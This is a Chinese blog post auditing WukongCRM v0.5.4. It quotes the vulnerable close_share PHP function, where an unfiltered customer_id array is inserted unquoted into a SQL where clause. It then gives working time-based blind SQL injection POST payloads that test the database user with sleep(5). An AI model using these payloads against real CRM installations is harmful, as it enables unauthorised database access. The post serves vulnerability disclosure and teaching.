蜗蜗侠's Blog-关注网络安全移动版

主页 > 代码审计 >

审计悟空CRM最新版V0.5.4 SQL注入

一直没人讲代码审计。(漏洞发过,别想了)

问题出在
5Kcrmv0.5.4/App/Lib/Action/CustomerAction.class.php

  • public function close_share(){
  • if($this­>isPost()){
  • $m_share = M('customerShare');
  • $customer_ids = is_array($_POST['customer_id']) ? implode(',', $_POST['customer_id']) : '';
  • if (empty($customer_ids)) {
  • alert('error', L('HAVE_NOT CHOOSE_ANY CONTENT'), $_SERVER['HTTP_REFERER']);
  • }
  •  
  • else {
  •  
  • $is_deleted = $m_share ­>where('customer_id in (%s)',$customer_ids)­>delete(); if($is_deleted){
  • alert('success','关闭共享成功!',$_SERVER["HTTP_REFERER"]); }else{
  • alert('error','关闭共享失败!',$_SERVER["HTTP_REFERER"]);
  •  
  • }
  •  
  • }

[color=rgb(85, 85, 85) !important]复制代码
获取数组参数customer_id后,添加逗号拼接成字符串,然后直接带入到where语句中,没过滤,没有引号包围。可以注入
http://127.0.0.1/5Kcrmv0.5.4/ind ... r&a=close_share

POST:customer_id[]=1) and if(substring(user(),1,4)=0x726f6f74,sleep(5),1))­­ 1

当user()前四位为root时,成功延迟


当错误时,不延时

customer_id[]=1) and if(substring(user(),1,4)=0x111,sleep(5),1))­­ 1




看看sql执行情况

(责任编辑:蜗蜗侠)